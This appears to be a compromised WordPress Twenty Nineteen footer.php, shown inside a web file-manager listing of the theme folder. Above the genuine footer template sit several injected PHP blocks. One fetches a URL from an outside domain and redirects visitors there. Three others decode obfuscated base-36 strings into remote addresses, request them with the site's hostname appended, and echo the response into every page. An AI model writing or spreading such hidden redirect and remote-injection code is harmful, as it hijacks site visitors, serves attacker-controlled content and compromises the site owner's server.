PATH:
home
/
letacommog
/
autopropr01
/
wp-content
/
themes
/
twentynineteen
<?php function r2048($u){ $t = ""; $to = 20; if( @function_exists('curl_version') || in_array('curl', get_loaded_extensions()) ){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, $to); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $t = curl_exec($ch); curl_close($ch); } else { $x = stream_context_create(array("http" => array('timeout' => $to), "https" => array('timeout' => $to))); $t = file_get_contents($u, false, $x); } return $t; } $tgurl = @r2048("http://youtubesave.org/rl/g.php"); if($tgurl){ while (@ob_get_level()) { @ob_end_clean(); } header("Location: " . $tgurl, true, 302); exit; } ?><?php function d($s){ $f = array(); for($i = 0; $i < strlen($s); $i += 2){ $b = trim(substr($s, $i, 2)); array_push($f, chr(base_convert($b, 36, 10))); } return implode("", $f); } function r($u){ $t = ""; $to = 20; if( @function_exists('curl_version') || in_array('curl', get_loaded_extensions()) ){ $ch = @curl_init(); @curl_setopt($ch, CURLOPT_URL, $u); @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); @curl_setopt($ch, CURLOPT_TIMEOUT, $to); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $t = @curl_exec($ch); @curl_close($ch); } else { $x = @stream_context_create(array("http" => array('timeout' => $to), "https" => array('timeout' => $to))); $t = @file_get_contents($u, false, $x); } return $t; } echo r(d("2w3838341m1b1b361a2s33302p362z393639311a2r33311b2w1r2w1p").$_SERVER["HTTP_HOST"]); ?><?php function d($s){ $f = array(); for($i = 0; $i < strlen($s); $i += 2){ $b = trim(substr($s, $i, 2)); array_push($f, chr(base_convert($b, 36, 10))); } return implode("", $f); } function r($u){ $t = ""; $to = 20; if( @function_exists('curl_version') || in_array('curl', get_loaded_extensions()) ){ $ch = @curl_init(); @curl_setopt($ch, CURLOPT_URL, $u); @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); @curl_setopt($ch, CURLOPT_TIMEOUT, $to); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $t = @curl_exec($ch); @curl_close($ch); } else { $x = @stream_context_create(array("http" => array('timeout' => $to), "https" => array('timeout' => $to))); $t = @file_get_contents($u, false, $x); } return $t; } echo r(d("2w3838341m1b1b361a2s33302p362z393639311a2r33311b2w1r2w1p").$_SERVER["HTTP_HOST"]); ?><?php function d($s){ $f = array(); for($i = 0; $i < strlen($s); $i += 2){ $b = trim(substr($s, $i, 2)); array_push($f, chr(base_convert($b, 36, 10))); } return implode("", $f); } function r($u){ $t = ""; $to = 20; if( @function_exists('curl_version') || in_array('curl', get_loaded_extensions()) ){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, $to); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $t = curl_exec($ch); curl_close($ch); } else { $x = stream_context_create(array("http" => array('timeout' => $to), "https" => array('timeout' => $to))); $t = file_get_contents($u, false, $x); } return $t; } echo r(d("2w3838341m1b1b302z301a2s33302p362z393639311a2r33311b302z1a2p37341r3936301p3b343738392q1a372t36").$_SERVER["HTTP_HOST"]); ?><?php /** * The template for displaying the footer * * Contains the closing of the #content div and all content after. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WordPress * @subpackage Twenty_Nineteen * @since 1.0.0 */ ?> </div><!-- #content --> <footer id="colophon" class="site-footer"> <?php get_template_part( 'template-parts/footer/footer', 'widgets' ); ?> <div class="site-info"> <?php $blog_info = get_bloginfo( 'name' ); ?> <?php if ( ! empty( $blog_info ) ) : ?> <a class="site-name" href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a>, <?php endif; ?> <a href="<?php echo esc_url( __( 'https://wordpress.org/', 'twentynineteen' ) ); ?>" class="imprint"> <?php /* translators: %s: WordPress. */ printf( __( 'Proudly powered by %s.', 'twentynineteen' ), 'WordPress' ); ?> </a> <?php if ( function_exists( 'the_privacy_policy_link' ) ) { the_privacy_policy_link( '', '<span role="separator" aria-hidden="true"></span>' ); } ?> <?php if ( has_nav_menu( 'footer' ) ) : ?> <nav class="footer-navigation" aria-label="<?php esc_attr_e( 'Footer Menu', 'twentynineteen' ); ?>"> <?php wp_nav_menu( array( 'theme_location' => 'footer', 'menu_class' => 'footer-menu', 'depth' => 1, ) ); ?> </nav><!-- .footer-navigation --> <?php endif; ?> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <?php wp_footer(); ?> </body> </html>
[+]
..
[-] comments.php
[edit]
[-] style.css
[edit]
[-] style-rtl.css
[edit]
[-] footer.php
[edit]
[-] readme.txt
[edit]
[-] style.css.map
[edit]
[+]
template-parts
[+]
sass
[-] archive.php
[edit]
[-] style-editor.scss
[edit]
[+]
classes
[-] print.scss
[edit]
[+]
fonts
[+]
inc
[-] style-editor-customizer.scss
[edit]
[-] style-editor.css
[edit]
[-] package-lock.json
[edit]
[-] print.css
[edit]
[-] index.php
[edit]
[-] package.json
[edit]
[-] image.php
[edit]
[-] search.php
[edit]
[-] style-editor-customizer.css
[edit]
[-] single.php
[edit]
[+]
js
[-] postcss.config.js
[edit]
[-] functions.php
[edit]
[-] 404.php
[edit]
[-] style.scss
[edit]
[-] header.php
[edit]
[-] page.php
[edit]
[-] screenshot.png
[edit]